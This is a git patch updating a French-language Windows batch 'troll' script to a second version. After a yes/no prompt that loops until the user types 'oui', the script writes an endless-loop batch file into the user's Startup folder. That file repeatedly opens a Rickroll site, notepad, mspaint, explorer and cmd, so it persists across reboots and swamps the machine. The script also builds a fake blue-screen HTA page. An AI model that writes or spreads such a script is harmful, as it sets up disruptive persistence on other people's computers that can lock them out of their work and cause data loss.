From 630f54d061d76a2822693afd9827ac989e631d2e Mon Sep 17 00:00:00 2001 From: Albirew Date: Sat, 28 Sep 2024 02:07:32 +0200 Subject: [PATCH] updated YOLO troll script to v2 --- windows/YOLO/YOLO.bat | 37 +++++++++++++++++++------------------ 1 file changed, 19 insertions(+), 18 deletions(-) diff --git a/windows/YOLO/YOLO.bat b/windows/YOLO/YOLO.bat index 9b265ca..6f94c5a 100644 --- a/windows/YOLO/YOLO.bat +++ b/windows/YOLO/YOLO.bat @@ -1,27 +1,29 @@ @echo off -:: YOLO v1 - debut des hostilites -setlocal ENABLEDELAYEDEXPANSION +:: YOLO v2 - tu peux pas test +msg * salut a toi +msg * ceci sera ta seule chance avant de te faire pwner set reponse= :q echo veux-tu te faire pwner? (oui/non) set /p reponse= if /i %reponse%==oui (echo C'est parti, mon kiki!) else (echo Allez, quoi... fait pas ta precieuse! & goto q) -set lol=0 -:pwn -set /a lol=%lol%+1 -set /a variable=%lol% %%2 -if !variable! EQU 0 (color 0f) else (color f0) -start http://rickrolled.fr -start notepad.exe -msg * NORAJ! -start mspaint.exe -start explorer.exe -start cmd.exe -if %lol%==100 goto fin -GOTO pwn +cd "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" +echo @echo off > lol.bat +echo setlocal ENABLEDELAYEDEXPANSION >> lol.bat +echo set lol=0 >> lol.bat +echo :pwn >> lol.bat +echo set /a lol=%%lol%%+1 >> lol.bat +echo set /a variable=%%lol%% %%%%2 >> lol.bat +echo if !variable! EQU 0 (color 0f) else (color f0) >> lol.bat +echo start http://rickrolled.fr >> lol.bat +echo start notepad.exe >> lol.bat +echo msg * NORAJ! >> lol.bat +echo start mspaint.exe >> lol.bat +echo start explorer.exe >> lol.bat +echo start cmd.exe >> lol.bat +echo GOTO pwn >> lol.bat -:fin cd %tmp% echo ^^^BSOD^ > bsod.hta echo. >> bsod.hta @@ -59,5 +61,4 @@ echo ^Contact your system administrator or technical support group for furth echo. >> bsod.hta echo. >> bsod.hta echo ^ >> bsod.hta -echo ^^ >> bsod.hta -start "" "bsod.hta" \ No newline at end of file +echo ^^ >> bsod.hta \ No newline at end of file